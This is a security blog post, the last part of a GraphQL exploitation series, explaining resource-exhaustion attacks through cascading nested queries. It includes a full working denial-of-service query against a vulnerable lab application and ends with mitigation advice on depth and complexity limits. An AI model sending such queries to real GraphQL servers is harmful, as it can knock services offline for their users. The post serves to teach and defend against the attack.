URL: https://payatu.com/blog/manmeet/graphql-exploitation-part-4

Graphql Exploitation - Part 4- Resource Exhaustion (DOS)
manmeet, 31-August-2021

We have finally reached the last part of the GraphQL exploitation series. If you
are visiting this blog without having gone through the previous parts, we
recommend reading them first.

In this blog, we will go through another possible vulnerability in a GraphQL
server: resource exhaustion. Because the client controls how much data it
requests, it can issue a query that exhausts resources on the storage backing
the GraphQL server, as well as on the GraphQL server itself while it serialises
the result to JSON.

This vulnerability affects not only the Query operation; it can also be
triggered through Mutation and Subscription operations. When a large amount of
data is sent in the parameters of a mutation, the server burns a high level of
CPU just to process it. Registering a large number of subscribers, or sending a
large amount of data in the parameters of a subscription, can also drive CPU
utilisation up.

To demonstrate this we will use the same lab as before, which can be found here.
In this application Dogs reference their Veterinary and the Veterinary
references its Dogs, so a query can cascade back and forth between the two,
producing resource depletion at the SQL level on the database.

Let's formulate a big cascading query like this:

query dos {
  allDogs(onlyFree: false, limit: 1000000) {
    id
    name
    veterinary {
      id
      name
      dogs {
        id
        name
        veterinary {
          id
          name
          dogs {
            id
            name
            veterinary {
              id
              name
              dogs {
                id
                name
                veterinary {
                  id
                  name
                  dogs {
                    id
                    name
                    veterinary {
                      id
                      name
                      dogs {
                        id
                        name
                      }
                    }
                  }
                }
              }
            }
          }
        }
      }
    }
  }
}


When we send this query to the server, it starts using almost 100% of the CPU,
as shown below.

Remember that to exploit the Query operation one must find a relation between
two elements of the database schema that points both ways, as here, where Dogs
and Veterinary were related in both directions.


MITIGATION


FOR QUERY

The GraphQL developer needs to know the security strategies that prevent such
exploitation for every type of operation. One can find these steps described
briefly in this blog. Use the built-in protection for Maximum Query Depth and
Query Complexity, depending on the GraphQL server implementation chosen.


FOR MUTATION/SUBSCRIPTION

 * Use input validation to limit the size of the incoming data that is accepted.
 * Limit the number of subscribers at the code level.


REFERENCES

 * https://github.com/righettod/poc-graphql
 * https://www.howtographql.com/advanced/4-security/
